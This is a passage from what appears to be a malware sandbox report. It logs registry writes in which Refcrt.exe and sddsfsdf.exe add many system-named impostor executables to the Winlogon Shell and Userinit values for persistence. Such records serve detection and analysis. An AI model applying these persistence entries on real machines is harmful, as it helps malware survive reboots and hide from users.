\"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\", \"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" | C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All 